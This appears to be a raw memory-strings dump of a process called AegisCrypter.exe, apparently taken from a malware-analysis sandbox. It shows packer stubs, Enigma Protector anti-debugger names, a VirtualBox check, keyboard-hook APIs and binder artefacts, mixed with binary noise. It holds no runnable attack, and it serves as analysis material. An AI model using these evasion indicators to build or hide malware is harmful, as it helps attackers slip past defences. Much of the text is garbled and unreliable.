2roledlg.dll
sgdiplus.dll
vimagehlp.dll
5ucrypt32.dll
4umsasn1.dll
<roleacc.dll
vwininet.dll
6wnormaliz.dll
iviertutil.dll
uuurlmon.dll
*wimm32.dll
vmsctf.dll
swinmm.dll
pshfolder.dll
-uprofapi.dll
usspicli.dll

AegisCrypter.exe_3500_rwx_0096C000_00008000:

muDP
Xz}5786A6B5894D8BC900201B810DA4A1ADD4351378790A98138533067CP4S86R7D8THS45GBCVUM635EPRQRMYRP3DAA5DUPZ6ABDSFP7F5ACP7ERGH4A7Y6B6NW6NMMBZF83WVER9Y4MMBNLBQDKR7KFVLGLV067CFDQCWCHGQVVRN24DECEPBL96YJQJTVDCRTNQG3E4WW4GK4GQ5X5L5H88D3XYHCBRBNASPD3P5CNYFKFHBCSDHHD6WPTCC4XVSM5

AegisCrypter.exe_3500_rwx_009B8000_00060000:

/)"/)"/)"/)"1)"2*#2 "2 "2 "1*!!
5,#5,#6-$4.#4.#6-#6-#6-#7.$6-#6-#7.$6-#90&7.!'
G<.pf\ofYSF86&
D5%shZeXJ7$
<0$=1$=1%<0$=1$=1%?1%@2&>1#3&
@3%sg[rf\nbVNA32"
0,'>:5>:5?;60-(
>7.UNEe^UibYjb[f_V[RID;1 "
?1%UG;hZNug[ug[ug[hZN]M@E5%5%
F7.qaZ
muDP

AegisCrypter.exe_3500_rwx_012EA000_00095000:

.PAVCOleException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.PAVCOleDispatchException@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AVCMFCToolBarCmdUI@@
.PAVCFileException@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
1.2.8
.?AVCCmdTarget@@
.PAVCException@@
.rsrc
6.RYMWr2
U]r.sL
lQ@t^|n`%C
G46%x)
qB.oz
j.LcJ
cXd%s~
5-'.vO
.V-e}?
$Tl
d1MJ%F
S..odJ
bs{mN)
.XkpE
`%UoX
Pw&.OmdA
X%fS;
R[.ag;
[,tcpM
.lB,^}
version="0.0.0.0"
<description>UPX executable packer</description>
KERNEL32.DLL
msvcrt.dll
.text
`.rdata
@.data
KERNEL32.dll
ShellExecuteA
SHELL32.dll
MSVCRT.dll
_acmdln
%s.%s
;L.ll8
KEYKYY
!"#$%&'()* ,-./
GUfx.DL1
-B`.rd
USER32.dll
iexpress.exe
makecab.exe
wextract.exe
X.SED
\.iUmj
NZS%x
Lh-g}
%SAjH
.Yq>0Ea
g%sW|
.YrNu
PSSSSSSh
.?AVCExetovbs@@
.?AVCLoginDlg@@
FreeStub20170327.Bin
The UPX Team hXXp://upx.sf.net
UPX executable packer
3.05 (2010-04-27)
upx.exe
1, 0, 0, 1
BindStub.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\AegisCrypter.exe

AegisCrypter.exe_3500_rwx_01402000_002A4000:

.idata
.edata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Windows 95
WIN_VER_WINDOWS95
Windows 95 OSR2
WIN_VER_WINDOWS95OSR2
Windows 98
WIN_VER_WINDOWS98
Windows 98 SE
WIN_VER_WINDOWS98SE
Windows ME
WIN_VER_WINDOWSME
Windows 2000
WIN_VER_WINDOWS2000
Windows 2000 Professional
WIN_VER_WINDOWS2000PROF
Windows 2000 Data Server
WIN_VER_WINDOWS2000DATASERVER
Windows 2000 Advanced Server
WIN_VER_WINDOWS2000ADVSERVER
Windows 2000 Server
WIN_VER_WINDOWS2000SERVER
Windows XP
WIN_VER_WINDOWSXP
Windows XP Home
WIN_VER_WINDOWSXPHOME
Windows XP Professional
WIN_VER_WINDOWSXPPROF
Windows XP Professional x64
WIN_VER_WINDOWSXPPROFx64
Windows XP Professional Datacenter x64
WIN_VER_WINDOWSXPPROFDATACENTERx64
Windows XP Professional Enterprise x64
WIN_VER_WINDOWSXPPROFENERPRICEx64
Windows XP Professional Standart x64
WIN_VER_WINDOWSXPPROFSTANDARTx64
Windows 2003
Windows 2003 Server
WIN_VER_WINDOWS2003SERVER
Windows 2003 Server R2
WIN_VER_WINDOWS2003SERVERR2
Windows 2003 Storage Server
WIN_VER_WINDOWS2003STORAGESERVER
Windows 2003 Datacenter Itanium
WIN_VER_WINDOWS2003DATACENTERITANIUM
Windows 2003 Enterprise Itanium
WIN_VER_WINDOWS2003ENTERPRICEITANIUM
Windows 2003 Datacenter x64
WIN_VER_WINDOWS2003DATACENTERx64
Windows 2003 Enterprise x64
WIN_VER_WINDOWS2003ENERPRICEx64
Windows 2003 Standart x64
WIN_VER_WINDOWS2003STANDARTx64
Windows 2003 Compute
WIN_VER_WINDOWS2003COMPUTE
Windows 2003 Datacenter
WIN_VER_WINDOWS2003DATACENTER
Windows 2003 Enterprise
WIN_VER_WINDOWS2003ENTERPRICE
Windows 2003 Web
WIN_VER_WINDOWS2003WEB
Windows 2003 Standart
WIN_VER_WINDOWS2003STANDART
Windows Vista
WIN_VER_WINDOWSVISTA
Windows Vista Business
WIN_VER_WINDOWSVISTA_BUSINESS
Windows Vista Cluster Server
WIN_VER_WINDOWSVISTA_CLUSTER_SERVER
Windows Vista Datacenter Server
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER
Windows Vista Datacenter Server Core
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER_CORE
Windows Vista Datacenter Server Core V
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER_CORE_V
Windows Vista Datacenter Server V
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER_V
Windows Vista Enterprise
WIN_VER_WINDOWSVISTA_ENTERPRICE
Windows Vista Enterprise Server
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER
Windows Vista Enterprise Server Core
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_CORE
Windows Vista Enterprise Server V
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_V
Windows Vista Enterprise Server Core V
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_CORE_V
Windows Vista Enterprise Server IA64
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_IA64
Windows Vista Home Basic
WIN_VER_WINDOWSVISTA_HOME_BASIC
Windows Vista Home Premium
WIN_VER_WINDOWSVISTA_HOME_PREMIUM
Windows Vista Home Server
WIN_VER_WINDOWSVISTA_HOME_SERVER
Windows Vista Server For Small Business
WIN_VER_WINDOWSVISTA_SERVER_FOR_SMALLBUSINESS
Windows Vista Small Business Server
WIN_VER_WINDOWSVISTA_SMALLBUSINESS_SERVER
Windows Vista Small Business Server Premium
WIN_VER_WINDOWSVISTA_SMALLBUSINESS_SERVER_PREMIUM
Windows Vista Medium Business Server Management
WIN_VER_WINDOWSVISTA_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows Vista Medium Business Server Messaging
WIN_VER_WINDOWSVISTA_MEDIUMBUSINESS_SERVER_MESSAGING
Windows Vista Medium Business Server Security
WIN_VER_WINDOWSVISTA_MEDIUMBUSINESS_SERVER_SECURITY
Windows Vista Standard Server
WIN_VER_WINDOWSVISTA_STANDARD_SERVER
Windows Vista Standard Server V
WIN_VER_WINDOWSVISTA_STANDARD_SERVER_V
Windows Vista Standard Server Core
WIN_VER_WINDOWSVISTA_STANDARD_SERVER_CORE
Windows Vista Standard Server Core V
WIN_VER_WINDOWSVISTA_STANDARD_SERVER_CORE_V
Windows Vista Starter
WIN_VER_WINDOWSVISTA_STARTER
Windows Vista Storage Enterprise Server
WIN_VER_WINDOWSVISTA_STORAGE_ENTERPRISE_SERVER
Windows Vista Storage Express Server
WIN_VER_WINDOWSVISTA_STORAGE_EXPRESS_SERVER
Windows Vista Storage Standard Server
WIN_VER_WINDOWSVISTA_STORAGE_STANDARD_SERVER
Windows Vista Storage Workgroup Server
WIN_VER_WINDOWSVISTA_STORAGE_WORKGROUP_SERVER
Windows Vista Undefined
WIN_VER_WINDOWSVISTA_UNDEFINED
Windows Vista Ultimate
WIN_VER_WINDOWSVISTA_ULTIMATE
Windows Vista Web Server
WIN_VER_WINDOWSVISTA_WEB_SERVER
Windows Vista Web Server Core
WIN_VER_WINDOWSVISTA_WEB_SERVER_CORE
Windows Vista Unlicensed
WIN_VER_WINDOWSVISTA_UNLICENSED
Windows 2008
WIN_VER_WINDOWS2008
Windows 2008 Business
WIN_VER_WINDOWS2008_BUSINESS
Windows 2008 Cluster Server
WIN_VER_WINDOWS2008_CLUSTER_SERVER
Windows 2008 Datacenter Server
WIN_VER_WINDOWS2008_DATACENTER_SERVER
Windows 2008 Datacenter Server Core
WIN_VER_WINDOWS2008_DATACENTER_SERVER_CORE
Windows 2008 Datacenter Server Core V
WIN_VER_WINDOWS2008_DATACENTER_SERVER_CORE_V
Windows 2008 Datacenter Server V
WIN_VER_WINDOWS2008_DATACENTER_SERVER_V
Windows 2008 Enterprise
WIN_VER_WINDOWS2008_ENTERPRICE
Windows 2008 Enterprise Server
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER
Windows 2008 Enterprise Server Core
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_CORE
Windows 2008 Enterprise Server V
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_V
Windows 2008 Enterprise Server Core V
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_CORE_V
Windows 2008 Enterprise Server IA64
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_IA64
Windows 2008 Home Basic
WIN_VER_WINDOWS2008_HOME_BASIC
Windows 2008 Home Premium
WIN_VER_WINDOWS2008_HOME_PREMIUM
Windows 2008 Home Server
WIN_VER_WINDOWS2008_HOME_SERVER
Windows 2008 Server For Small Business
WIN_VER_WINDOWS2008_SERVER_FOR_SMALLBUSINESS
Windows 2008 Small Business Server
WIN_VER_WINDOWS2008_SMALLBUSINESS_SERVER
Windows 2008 Small Business Server Premium
WIN_VER_WINDOWS2008_SMALLBUSINESS_SERVER_PREMIUM
Windows 2008 Medium Business Server Management
WIN_VER_WINDOWS2008_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows 2008 Medium Business Server Messaging
WIN_VER_WINDOWS2008_MEDIUMBUSINESS_SERVER_MESSAGING
Windows 2008 Medium Business Server Security
WIN_VER_WINDOWS2008_MEDIUMBUSINESS_SERVER_SECURITY
Windows 2008 Standard Server
WIN_VER_WINDOWS2008_STANDARD_SERVER
Windows 2008 Standard Server V
WIN_VER_WINDOWS2008_STANDARD_SERVER_V
Windows 2008 Standard Server Core
WIN_VER_WINDOWS2008_STANDARD_SERVER_CORE
Windows 2008 Standard Server Core V
WIN_VER_WINDOWS2008_STANDARD_SERVER_CORE_V
Windows 2008 Starter
WIN_VER_WINDOWS2008_STARTER
Windows 2008 Storage Enterprise Server
WIN_VER_WINDOWS2008_STORAGE_ENTERPRISE_SERVER
Windows 2008 Storage Express Server
WIN_VER_WINDOWS2008_STORAGE_EXPRESS_SERVER
Windows 2008 Storage Standard Server
WIN_VER_WINDOWS2008_STORAGE_STANDARD_SERVER
Windows 2008 Storage Workgroup Server
WIN_VER_WINDOWS2008_STORAGE_WORKGROUP_SERVER
Windows 2008 Undefined
WIN_VER_WINDOWS2008_UNDEFINED
Windows 2008 Ultimate
WIN_VER_WINDOWS2008_ULTIMATE
Windows 2008 Web Server
WIN_VER_WINDOWS2008_WEB_SERVER
Windows 2008 Web Server Core
WIN_VER_WINDOWS2008_WEB_SERVER_CORE
Windows 2008 Unlicensed
WIN_VER_WINDOWS2008_UNLICENSED
Windows 2008 R2
WIN_VER_WINDOWS2008R2
Windows 2008 R2 Business
WIN_VER_WINDOWS2008R2_BUSINESS
Windows 2008 R2 Cluster Server
WIN_VER_WINDOWS2008R2_CLUSTER_SERVER
Windows 2008 R2 Datacenter Server
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER
Windows 2008 R2 Datacenter Server Core
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER_CORE
Windows 2008 R2 Datacenter Server Core V
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER_CORE_V
Windows 2008 R2 Datacenter Server V
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER_V
Windows 2008 R2 Enterprise
WIN_VER_WINDOWS2008R2_ENTERPRICE
Windows 2008 R2 Enterprise Server
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER
Windows 2008 R2 Enterprise Server Core
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_CORE
Windows 2008 R2 Enterprise Server V
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_V
Windows 2008 R2 Enterprise Server Core V
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_CORE_V
Windows 2008 R2 Enterprise Server IA64
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_IA64
Windows 2008 R2 Home Basic
WIN_VER_WINDOWS2008R2_HOME_BASIC
Windows 2008 R2 Home Premium
WIN_VER_WINDOWS2008R2_HOME_PREMIUM
Windows 2008 R2 Home Server
WIN_VER_WINDOWS2008R2_HOME_SERVER
Windows 2008 R2 Server For Small Business
WIN_VER_WINDOWS2008R2_SERVER_FOR_SMALLBUSINESS
Windows 2008 R2 Small Business Server
WIN_VER_WINDOWS2008R2_SMALLBUSINESS_SERVER
Windows 2008 R2 Small Business Server Premium
WIN_VER_WINDOWS2008R2_SMALLBUSINESS_SERVER_PREMIUM
Windows 2008 R2 Medium Business Server Management
WIN_VER_WINDOWS2008R2_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows 2008 R2 Medium Business Server Messaging
WIN_VER_WINDOWS2008R2_MEDIUMBUSINESS_SERVER_MESSAGING
Windows 2008 R2 Medium Business Server Security
WIN_VER_WINDOWS2008R2_MEDIUMBUSINESS_SERVER_SECURITY
Windows 2008 R2 Standard Server
WIN_VER_WINDOWS2008R2_STANDARD_SERVER
Windows 2008 R2 Standard Server V
WIN_VER_WINDOWS2008R2_STANDARD_SERVER_V
Windows 2008 R2 Standard Server Core
WIN_VER_WINDOWS2008R2_STANDARD_SERVER_CORE
Windows 2008 R2 Standard Server Core V
WIN_VER_WINDOWS2008R2_STANDARD_SERVER_CORE_V
Windows 2008 R2 Starter
WIN_VER_WINDOWS2008R2_STARTER
Windows 2008 R2 Storage Enterprise Server
WIN_VER_WINDOWS2008R2_STORAGE_ENTERPRISE_SERVER
Windows 2008 R2 Storage Express Server
WIN_VER_WINDOWS2008R2_STORAGE_EXPRESS_SERVER
Windows 2008 R2 Storage Standard Server
WIN_VER_WINDOWS2008R2_STORAGE_STANDARD_SERVER
Windows 2008 R2 Storage Workgroup Server
WIN_VER_WINDOWS2008R2_STORAGE_WORKGROUP_SERVER
Windows 2008 R2 Undefined
WIN_VER_WINDOWS2008R2_UNDEFINED
Windows 2008 R2 Ultimate
WIN_VER_WINDOWS2008R2_ULTIMATE
Windows 2008 R2 Web Server
WIN_VER_WINDOWS2008R2_WEB_SERVER
Windows 2008 R2 Web Server Core
WIN_VER_WINDOWS2008R2_WEB_SERVER_CORE
Windows 2008 R2 Unlicensed
WIN_VER_WINDOWS2008R2_UNLICENSED
Windows 7
WIN_VER_WINDOWSSEVEN
Windows 7 Business
WIN_VER_WINDOWSSEVEN_BUSINESS
Windows 7 Cluster Server
WIN_VER_WINDOWSSEVEN_CLUSTER_SERVER
Windows 7 Datacenter Server
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER
Windows 7 Datacenter Server Core
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER_CORE
Windows 7 Datacenter Server Core V
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER_CORE_V
Windows 7 Datacenter Server V
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER_V
Windows 7 Enterprise
WIN_VER_WINDOWSSEVEN_ENTERPRICE
Windows 7 Enterprise Server
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER
Windows 7 Enterprise Server Core
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_CORE
Windows 7 Enterprise Server V
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_V
Windows 7 Enterprise Server Core V
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_CORE_V
Windows 7 Enterprise Server IA64
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_IA64
Windows 7 Home Basic
WIN_VER_WINDOWSSEVEN_HOME_BASIC
Windows 7 Home Premium
WIN_VER_WINDOWSSEVEN_HOME_PREMIUM
Windows 7 Home Server
WIN_VER_WINDOWSSEVEN_HOME_SERVER
Windows 7 Server For Small Business
WIN_VER_WINDOWSSEVEN_SERVER_FOR_SMALLBUSINESS
Windows 7 Small Business Server
WIN_VER_WINDOWSSEVEN_SMALLBUSINESS_SERVER
Windows 7 Small Business Server Premium
WIN_VER_WINDOWSSEVEN_SMALLBUSINESS_SERVER_PREMIUM
Windows 7 Medium Business Server Management
WIN_VER_WINDOWSSEVEN_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows 7 Medium Business Server Messaging
WIN_VER_WINDOWSSEVEN_MEDIUMBUSINESS_SERVER_MESSAGING
Windows 7 Medium Business Server Security
WIN_VER_WINDOWSSEVEN_MEDIUMBUSINESS_SERVER_SECURITY
Windows 7 Standard Server
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER
Windows 7 Standard Server V
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER_V
Windows 7 Standard Server Core
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER_CORE
Windows 7 Standard Server Core V
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER_CORE_V
Windows 7 Starter
WIN_VER_WINDOWSSEVEN_STARTER
Windows 7 Storage Enterprise Server
WIN_VER_WINDOWSSEVEN_STORAGE_ENTERPRISE_SERVER
Windows 7 Storage Express Server
WIN_VER_WINDOWSSEVEN_STORAGE_EXPRESS_SERVER
Windows 7 Storage Standard Server
WIN_VER_WINDOWSSEVEN_STORAGE_STANDARD_SERVER
Windows 7 Storage Workgroup Server
WIN_VER_WINDOWSSEVEN_STORAGE_WORKGROUP_SERVER
Windows 7 Undefined
WIN_VER_WINDOWSSEVEN_UNDEFINED
Windows 7 Ultimate
WIN_VER_WINDOWSSEVEN_ULTIMATE
Windows 7 Web Server
WIN_VER_WINDOWSSEVEN_WEB_SERVER
Windows 7 Web Server Core
WIN_VER_WINDOWSSEVEN_WEB_SERVER_CORE
Windows 7 Unlicensed
WIN_VER_WINDOWSSEVEN_UNLICENSED
Portuguese (Brazil)
Portuguese (Portugal)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
.Owner
W:\3rdparty\ScreamSec\SecUtils.pas
TCipher.CreateIntf: Algorithm mismatch
TBlockCipher.CreateIntf: Wrong VectorSize
Cipher mode not supported
The vector for %s is %d blocks. Cannot initialize with a %d block vector.
The block size for %s is %d bytes and the key is %d bytes. Cannot initialize with a %d block vector.
The minimum key and IV size for %s is %d bytes.
Not supported
TRijndael_PipedPCFB
Rijndael: Invalid key size - %d
2.16.840.1.101.3.4.1.1
2.16.840.1.101.3.4.1.21
2.16.840.1.101.3.4.1.41
1.3.6.1.4.1.13085.1.22
1.3.6.1.4.1.13085.1.23
1.3.6.1.4.1.13085.1.24
2.16.840.1.101.3.4.1.4
2.16.840.1.101.3.4.1.24
2.16.840.1.101.3.4.1.44
1.3.6.1.4.1.13085.1.7
1.3.6.1.4.1.13085.1.8
1.3.6.1.4.1.13085.1.9
1.3.6.1.4.1.13085.1.4
1.3.6.1.4.1.13085.1.5
1.3.6.1.4.1.13085.1.6
1.3.6.1.4.1.13085.1.10
1.3.6.1.4.1.13085.1.11
1.3.6.1.4.1.13085.1.12
1.3.6.1.4.1.13085.1.1
1.3.6.1.4.1.13085.1.2
1.3.6.1.4.1.13085.1.3
1.3.6.1.4.1.13085.1.16
1.3.6.1.4.1.13085.1.17
1.3.6.1.4.1.13085.1.18
2.16.840.1.101.3.4.1.2
2.16.840.1.101.3.4.1.22
2.16.840.1.101.3.4.1.42
1.3.6.1.4.1.13085.1.19
1.3.6.1.4.1.13085.1.20
1.3.6.1.4.1.13085.1.21
2.16.840.1.101.3.4.1.3
2.16.840.1.101.3.4.1.23
2.16.840.1.101.3.4.1.43
2.16.840.1.101.3.4.1.5
2.16.840.1.101.3.4.1.25
2.16.840.1.101.3.4.1.45
/* Dr Brian Gladman (gladman@seven77.demon.co.uk) 14th January 1999 */
TGenerator.Create: Cipher mode must be cmCTR.
TMPPool.CheckThreadID: Called from the wrong thread.
TMPPool.Cache: Invalid pointer
TMPPool.Obtain: Out of memory
TMPPool.InternalCheck: Invalid pointer
Portugal
Turkey
12345678-
ole32.dll
comctl32.dll
!"#$%&*;<=>@[]^_`{|}
TNT Internal Error: TWideComponentHelper.Create should never be encountered.
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntClasses.pas
ntdll.dll
EInvalidGraphicOperation
USER32.DLL
uxtheme.dll
Proportional
MAPI32.DLL
TComboBoxExEnumerator
ssHorizontal
OnKeyDown
OnKeyPress|
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
HelpKeyword
OnExecute<iG
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
AutoHotkeys
AutoHotkeys0_H
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
imm32.dll
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntActnList.pas
PasswordChar
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntStdCtrls.pas
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntForms.pas
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntMenus.pas
Internal Error: SyncHotKeyPosition Failed ("%s" <> "%s").
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntControls.pas
Internal Error: SubClassUnicodeControl.Control is not Unicode.
.UnicodeClass
TntUnicodeVcl.DestroyWindow
Software\Microsoft\Windows\CurrentVersion
ProductKey
Software\Microsoft\Windows NT\CurrentVersion
\\.\Scsi0:
\\.\SMARTVSD
\\.\%s
\\.\PhysicalDrive0
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntRegistry.pas
#$%&'()* ,-./01234
PSAPI.dll
VBoxService.exe
ÞFAULT FOLDER%
%SYSTEM FOLDER%
%WINDOWS FOLDER%
Mutex object: Unique: %d-%d. Number: %d
%s\%.8x%.8x-%.8x%.8x
Ú4'
THookWindowsAPI
EP_RegCheckKey
EP_RegCheckKeyA
EP_RegCheckKeyW
EP_RegSaveKey
EP_RegSaveKeyA
EP_RegSaveKeyW
EP_RegLoadKey
EP_RegLoadKeyA
EP_RegLoadKeyW
EP_RegLoadAndCheckKey
EP_RegCheckAndSaveKey
EP_RegCheckAndSaveKeyA
EP_RegCheckAndSaveKeyW
EP_RegDeleteKey
EP_RegKeyExpirationDate
EP_RegKeyExpirationDateEx
EP_RegKeyCreationDate
EP_RegKeyCreationDateEx
EP_RegKeyExecutions
EP_RegKeyExecutionsTotal
EP_RegKeyExecutionsLeft
EP_RegKeyDays
EP_RegKeyDaysTotal
EP_RegKeyDaysLeft
EP_RegKeyRuntime
EP_RegKeyRuntimeTotal
EP_RegKeyRuntimeLeft
EP_RegKeyGlobalTime
EP_RegKeyGlobalTimeTotal
EP_RegKeyGlobalTimeLeft
EP_RegKeyRegisterAfterDate
EP_RegKeyRegisterAfterDateEx
EP_RegKeyRegisterBeforeDate
EP_RegKeyRegisterBeforeDateEx
EP_TrialExecutions
EP_TrialExecutionsTotal
EP_TrialExecutionsLeft
EP_TrialExecutionTime
EP_TrialExecutionTimeTotal
EP_TrialExecutionTimeLeft
EP_RegCheckKeyEx
EP_RegSaveKeyEx
EP_RegLoadKeyEx
EP_CheckUpStartupPasswordHashString
EP_ProtectedStringByKey
DLL_Loader_Import_Unit
TInitImport
-pri}
Function %s not found in module %s
File not found: %s
Can't find DLL entry point %s in %s
"%s" %s
%s %s
Could not load library: %s
TExportedp
\\.\NTICE
\\.\SICE
\\.\SIWDEBUG
)TEnigmaProtectorLoaderFormStartuppassword
DLL_Loader_RunPassword_Unit
Application requires password to start
decrypt_on_execute_begin
ECRONEXECB
decrypt_on_execute_end
ECRONEXECE
Xz}5786A6B5894D8BC900201B810DA4A1ADD4351378790A98138533067CP4S86R7D8THS45GBCVUM635EPRQRMYRP3DAA5DUPZ6ABDSFP7F5ACP7ERGH4A7Y6B6NW6NMMBZF83WVER9Y4MMBNLBQDKR7KFVLGLV067CFDQCWCHGQVVRN24DECEPBL96YJQJTVDCRTNQG3E4WW4GK4GQ5X5L5H88D3XYHCBRBNASPD3P5CNYFKFHBCSDHHD6WPTCC4XVSM5S88067C2JSTCMVT48C8HC7SHKGTFJBM28P6XTBCNWHMV6J6KN6W5Q9TQLVR285U6GVCAAUTZLRTPSRGDQ742B4742XF4MACRR747YDP5FZZ9D
notepad\secret.datt
.Wx=s
application.exe
iu2.iu
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegOpenKeyA
RegFlushKey
RegCreateKeyExA
GetWindowsDirectoryW
GetWindowsDirectoryA
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
VkKeyScanW
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyW
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextW
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
SHFolder.dll
shell32.dll
ShellExecuteW
ShellExecuteA
DLL_Loader.dll
?!?%?)?-?1?5?
>$?(?,?0?4?8?
?"?&?*?.?2?6?:?
2#202?2]2
: :&:2:::
<%< <7<?<{<
= =$=(=,=0=4=8=<=?>
94989<9`9
0)1-11151<1
6"6&6:6_6
4O4N4j4r4
? ?$?(?,?0?4?
2 2$222:273
7%7,747=7
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
TntWindows
UrlMon
KeyRoutines
 DLL_Loader_Import_Unit
_enigma_keygen_routines
.reloc
msimg32.dll
comdlg32.dll
winspool.drv
shlwapi.dll
oledlg.dll
gdiplus.dll
imagehlp.dll
crypt32.dll
oleacc.dll
wininet.dll
winmm.dll
ImageGetCertificateHeader
HttpQueryInfoW
%d-26
/<D@2bt.qm
DECRYPT_ON_EXECUTE_BEGIN
DECRYPT_ON_EXECUTE_END
%Cookies FOLDER%
Unspecified error (%d) from %s.
debug.log
ÚysToKeyExp%
%RegKey%
%KeyExpYear%
%KeyExpMonth%
%KeyExpDay%
%CU_EXTFILES%
%CU_EXECPR%
%CU_INSTSERV%
%CU_WINVER%
%CU_VIRTTOOLS%
%TrialExecsTotal%
%TrialExecsLeft%
%TrialExecMinsTotal%
%TrialExecMinsLeft%
enigma_ide.dll
Enter password
Change password
New password:
Confirm new password:
c:\users\"%CurrentUserName%"\appdata\local\temp\aegiscrypter.exe
RichEdit line insertion error=This control requires version 4.70 or greater of COMCTL32.DLL
No help keyword specified.
